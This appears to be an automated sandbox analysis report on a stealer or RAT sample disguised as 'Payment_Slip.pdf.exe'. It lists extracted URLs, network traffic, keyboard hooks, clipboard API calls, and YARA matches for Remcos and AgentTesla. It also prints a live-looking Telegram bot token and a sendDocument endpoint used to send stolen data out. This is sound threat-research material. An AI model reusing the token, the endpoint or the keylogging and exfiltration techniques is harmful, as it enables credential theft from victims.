0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1242727523.0000000003157000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003195000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.gmail.com
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                              Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                              Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                              Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242122397.0000000001354000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                              Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                              Source: Windows Update.exe, 0000001A.00000002.3620793390.00000000029D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                              Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://XlYyZVevQktG2Dz.org
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://XlYyZVevQktG2Dz.orgX
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://XlYyZVevQktG2Dz.orgt-
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument
                              Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                              Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                              Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                              Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                              Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                              Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                              Source: Payment_Slip.pdf.exeString found in binary or memory: https://login.yahoo.com/config/login
                              Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                              Source: edb.log.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003171000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003179000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003175000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003166000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003398000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.000000000342E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/a/answer/166852
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                              Source: Payment_Slip.pdf.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000011_2_00409340
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payment_Slip.pdf.exeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\host.exe
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\conserver.exe
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040A65A
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_00414EC1
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_0040987A
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004098E2
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406B9A
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00406C3D
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004072B5
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_00414EC1
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040A65A
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,11_2_00409468
                              Source: C:\Users\user\AppData\Roaming\host.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C3D1C0 GetKeyState,GetKeyState,GetKeyState,12_2_06C3D1C0
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C3D1D0 GetKeyState,GetKeyState,GetKeyState,12_2_06C3D1D0

                              E-Banking Fraud

                              barindex
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041A76C SystemParametersInfoW,11_2_0041A76C
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0041A76C SystemParametersInfoW,17_2_0041A76C

                              System Summary

                              barindex
                              Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
